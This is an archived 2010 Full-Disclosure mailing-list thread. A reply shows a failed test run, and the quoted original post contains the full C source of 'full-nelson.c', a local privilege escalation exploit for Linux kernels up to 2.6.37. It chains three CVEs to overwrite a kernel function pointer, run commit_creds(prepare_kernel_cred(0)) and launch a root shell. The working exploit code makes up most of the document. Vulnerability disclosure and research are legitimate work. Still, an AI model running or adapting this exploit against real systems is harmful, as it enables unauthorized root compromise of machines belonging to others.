[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <4CFF3DF4.8050404@asp64.com>
Date: Wed, 08 Dec 2010 09:12:36 +0100
From: Guillaume Friloux <guillaume.friloux@...64.com>
To: full-disclosure@...ts.grok.org.uk
Subject: Re: Linux kernel exploit
Doesnt work here on Ubuntu 10.10 (VirtualBox) clean install (but with
all updates) with only an “apt-get install build-essential”
kuri@...i-VirtualBox:~$ cat /etc/lsb-release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=10.10
DISTRIB_CODENAME=maverick
DISTRIB_DESCRIPTION="Ubuntu 10.10"
kuri@...i-VirtualBox:~$ uname -a
Linux kuri-VirtualBox 2.6.35-23-generic #41-Ubuntu SMP Wed Nov 24
10:18:49 UTC 2010 i686 GNU/Linux
kuri@...i-VirtualBox:~$ gcc -o exploit exploit.c
kuri@...i-VirtualBox:~$ ./exploit
[*] Resolving kernel addresses...
[+] Resolved econet_ioctl to 0xf81ca340
[+] Resolved econet_ops to 0xf81ca440
[+] Resolved commit_creds to 0xc016c8d0
[+] Resolved prepare_kernel_cred to 0xc016cd20
[*] Calculating target...
[*] Triggering payload...
[*] Exploit failed to get root.
kuri@...i-VirtualBox:~$
On 07/12/2010 22:21, Ryan Sears wrote:
> Yep, just tested it in an Ubuntu 10.10 sandbox I have (running kernel 2.6.35-22-generic). Works as expected.
>
> Great job Dan. You're full of win!
>
> Regards,
> Ryan Sears
> ----- Original Message -----
> From: "Cal Leeming [Simplicity Media Ltd]"<cal.leeming@...plicitymedialtd.co.uk>
> To: "Dan Rosenberg"<dan.j.rosenberg@...il.com>
> Cc: full-disclosure@...ts.grok.org.uk, bugtraq@...urityfocus.com
> Sent: Tuesday, December 7, 2010 4:06:44 PM GMT -05:00 US/Canada Eastern
> Subject: Re: [Full-disclosure] Linux kernel exploit
>
> Anyone tested this in sandbox yet?
>
> On 07/12/2010 20:25, Dan Rosenberg wrote:
>> Hi all,
>>
>> I've included here a proof-of-concept local privilege escalation exploit
>> for Linux. Please read the header for an explanation of what's going
>> on. Without further ado, I present full-nelson.c:
>>
>> Happy hacking,
>> Dan
>>
>>
>> --snip--
>>
>> /*
>> * Linux Kernel<= 2.6.37 local privilege escalation
>> * by Dan Rosenberg
>> * @djrbliss on twitter
>> *
>> * Usage:
>> * gcc full-nelson.c -o full-nelson
>> * ./full-nelson
>> *
>> * This exploit leverages three vulnerabilities to get root, all of which were
>> * discovered by Nelson Elhage:
>> *
>> * CVE-2010-4258
>> * -------------
>> * This is the interesting one, and the reason I wrote this exploit. If a
>> * thread is created via clone(2) using the CLONE_CHILD_CLEARTID flag, a NULL
>> * word will be written to a user-specified pointer when that thread exits.
>> * This write is done using put_user(), which ensures the provided destination
>> * resides in valid userspace by invoking access_ok(). However, Nelson
>> * discovered that when the kernel performs an address limit override via
>> * set_fs(KERNEL_DS) and the thread subsequently OOPSes (via BUG, page fault,
>> * etc.), this override is not reverted before calling put_user() in the exit
>> * path, allowing a user to write a NULL word to an arbitrary kernel address.
>> * Note that this issue requires an additional vulnerability to trigger.
>> *
>> * CVE-2010-3849
>> * -------------
>> * This is a NULL pointer dereference in the Econet protocol. By itself, it's
>> * fairly benign as a local denial-of-service. It's a perfect candidate to
>> * trigger the above issue, since it's reachable via sock_no_sendpage(), which
>> * subsequently calls sendmsg under KERNEL_DS.
>> *
>> * CVE-2010-3850
>> * -------------
>> * I wouldn't be able to reach the NULL pointer dereference and trigger the
>> * OOPS if users weren't able to assign Econet addresses to arbitrary
>> * interfaces due to a missing capabilities check.
>> *
>> * In the interest of public safety, this exploit was specifically designed to
>> * be limited:
>> *
>> * * The particular symbols I resolve are not exported on Slackware or Debian
>> * * Red Hat does not support Econet by default
>> * * CVE-2010-3849 and CVE-2010-3850 have both been patched by Ubuntu and
>> * Debian
>> *
>> * However, the important issue, CVE-2010-4258, affects everyone, and it would
>> * be trivial to find an unpatched DoS under KERNEL_DS and write a slightly
>> * more sophisticated version of this that doesn't have the roadblocks I put in
>> * to prevent abuse by script kiddies.
>> *
>> * Tested on unpatched Ubuntu 10.04 kernels, both x86 and x86-64.
>> *
>> * NOTE: the exploit process will deadlock and stay in a zombie state after you
>> * exit your root shell because the Econet thread OOPSes while holding the
>> * Econet mutex. It wouldn't be too hard to fix this up, but I didn't bother.
>> *
>> * Greets to spender, taviso, stealth, pipacs, jono, kees, and bla
>> */
>>
>> #include<stdio.h>
>> #include<sys/socket.h>
>> #include<fcntl.h>
>> #include<sys/ioctl.h>
>> #include<string.h>
>> #include<net/if.h>
>> #include<sched.h>
>> #include<stdlib.h>
>> #include<signal.h>
>> #include<sys/utsname.h>
>> #include<sys/mman.h>
>> #include<unistd.h>
>>
>> /* How many bytes should we clear in our
>> * function pointer to put it into userspace? */
>> #ifdef __x86_64__
>> #define SHIFT 24
>> #define OFFSET 3
>> #else
>> #define SHIFT 8
>> #define OFFSET 1
>> #endif
>>
>> /* thanks spender... */
>> unsigned long get_kernel_sym(char *name)
>> {
>> FILE *f;
>> unsigned long addr;
>> char dummy;
>> char sname[512];
>> struct utsname ver;
>> int ret;
>> int rep = 0;
>> int oldstyle = 0;
>>
>> f = fopen("/proc/kallsyms", "r");
>> if (f == NULL) {
>> f = fopen("/proc/ksyms", "r");
>> if (f == NULL)
>> goto fallback;
>> oldstyle = 1;
>> }
>>
>> repeat:
>> ret = 0;
>> while(ret != EOF) {
>> if (!oldstyle)
>> ret = fscanf(f, "%p %c %s\n", (void **)&addr,&dummy, sname);
>> else {
>> ret = fscanf(f, "%p %s\n", (void **)&addr, sname);
>> if (ret == 2) {
>> char *p;
>> if (strstr(sname, "_O/") || strstr(sname, "_S."))
>> continue;
>> p = strrchr(sname, '_');
>> if (p> ((char *)sname + 5)&& !strncmp(p - 3, "smp", 3)) {
>> p = p - 4;
>> while (p> (char *)sname&& *(p - 1) == '_')
>> p--;
>> *p = '\0';
>> }
>> }
>> }
>> if (ret == 0) {
>> fscanf(f, "%s\n", sname);
>> continue;
>> }
>> if (!strcmp(name, sname)) {
>> fprintf(stdout, " [+] Resolved %s to %p%s\n", name, (void *)addr, rep ? " (via System.map)" : "");
>> fclose(f);
>> return addr;
>> }
>> }
>>
>> fclose(f);
>> if (rep)
>> return 0;
>> fallback:
>> uname(&ver);
>> if (strncmp(ver.release, "2.6", 3))
>> oldstyle = 1;
>> sprintf(sname, "/boot/System.map-%s", ver.release);
>> f = fopen(sname, "r");
>> if (f == NULL)
>> return 0;
>> rep = 1;
>> goto repeat;
>> }
>>
>> typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
>> typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
>> _commit_creds commit_creds;
>> _prepare_kernel_cred prepare_kernel_cred;
>>
>> static int __attribute__((regparm(3)))
>> getroot(void * file, void * vma)
>> {
>>
>> commit_creds(prepare_kernel_cred(0));
>> return -1;
>>
>> }
>>
>> /* Why do I do this? Because on x86-64, the address of
>> * commit_creds and prepare_kernel_cred are loaded relative
>> * to rip, which means I can't just copy the above payload
>> * into my landing area. */
>> void __attribute__((regparm(3)))
>> trampoline()
>> {
>>
>> #ifdef __x86_64__
>> asm("mov $getroot, %rax; call *%rax;");
>> #else
>> asm("mov $getroot, %eax; call *%eax;");
>> #endif
>>
>> }
>>
>> /* Triggers a NULL pointer dereference in econet_sendmsg
>> * via sock_no_sendpage, so it's under KERNEL_DS */
>> int trigger(int * fildes)
>> {
>> int ret;
>> struct ifreq ifr;
>>
>> memset(&ifr, 0, sizeof(ifr));
>> strncpy(ifr.ifr_name, "eth0", IFNAMSIZ);
>>
>> ret = ioctl(fildes[2], SIOCSIFADDR,&ifr);
>>
>> if(ret< 0) {
>> printf("[*] Failed to set Econet address.\n");
>> return -1;
>> }
>>
>> splice(fildes[3], NULL, fildes[1], NULL, 128, 0);
>> splice(fildes[0], NULL, fildes[2], NULL, 128, 0);
>>
>> /* Shouldn't get here... */
>> exit(0);
>> }
>>
>> int main(int argc, char * argv[])
>> {
>> unsigned long econet_ops, econet_ioctl, target, landing;
>> int fildes[4], pid;
>> void * newstack, * payload;
>>
>> /* Create file descriptors now so there are two
>> references to them after cloning...otherwise
>> the child will never return because it
>> deadlocks when trying to unlock various
>> mutexes after OOPSing */
>> pipe(fildes);
>> fildes[2] = socket(PF_ECONET, SOCK_DGRAM, 0);
>> fildes[3] = open("/dev/zero", O_RDONLY);
>>
>> if(fildes[0]< 0 || fildes[1]< 0 || fildes[2]< 0 || fildes[3]< 0) {
>> printf("[*] Failed to open file descriptors.\n");
>> return -1;
>> }
>>
>> /* Resolve addresses of relevant symbols */
>> printf("[*] Resolving kernel addresses...\n");
>> econet_ioctl = get_kernel_sym("econet_ioctl");
>> econet_ops = get_kernel_sym("econet_ops");
>> commit_creds = (_commit_creds) get_kernel_sym("commit_creds");
>> prepare_kernel_cred = (_prepare_kernel_cred) get_kernel_sym("prepare_kernel_cred");
>>
>> if(!econet_ioctl || !commit_creds || !prepare_kernel_cred || !econet_ops) {
>> printf("[*] Failed to resolve kernel symbols.\n");
>> return -1;
>> }
>>
>> if(!(newstack = malloc(65536))) {
>> printf("[*] Failed to allocate memory.\n");
>> return -1;
>> }
>>
>> printf("[*] Calculating target...\n");
>> target = econet_ops + 10 * sizeof(void *) - OFFSET;
>>
>> /* Clear the higher bits */
>> landing = econet_ioctl<< SHIFT>> SHIFT;
>>
>> payload = mmap((void *)(landing& ~0xfff), 2 * 4096,
>> PROT_READ | PROT_WRITE | PROT_EXEC,
>> MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, 0, 0);
>>
>> if ((long)payload == -1) {
>> printf("[*] Failed to mmap() at target address.\n");
>> return -1;
>> }
>>
>> memcpy((void *)landing,&trampoline, 1024);
>>
>> clone((int (*)(void *))trigger,
>> (void *)((unsigned long)newstack + 65536),
>> CLONE_VM | CLONE_CHILD_CLEARTID | SIGCHLD,
>> &fildes, NULL, NULL, target);
>>
>> sleep(1);
>>
>> printf("[*] Triggering payload...\n");
>> ioctl(fildes[2], 0, NULL);
>>
>> if(getuid()) {
>> printf("[*] Exploit failed to get root.\n");
>> return -1;
>> }
>>
>> printf("[*] Got root!\n");
>> execl("/bin/sh", "/bin/sh", NULL);
>> }
>>
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
View attachment "guillaume_friloux.vcf" of type "text/x-vcard" (172 bytes)
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists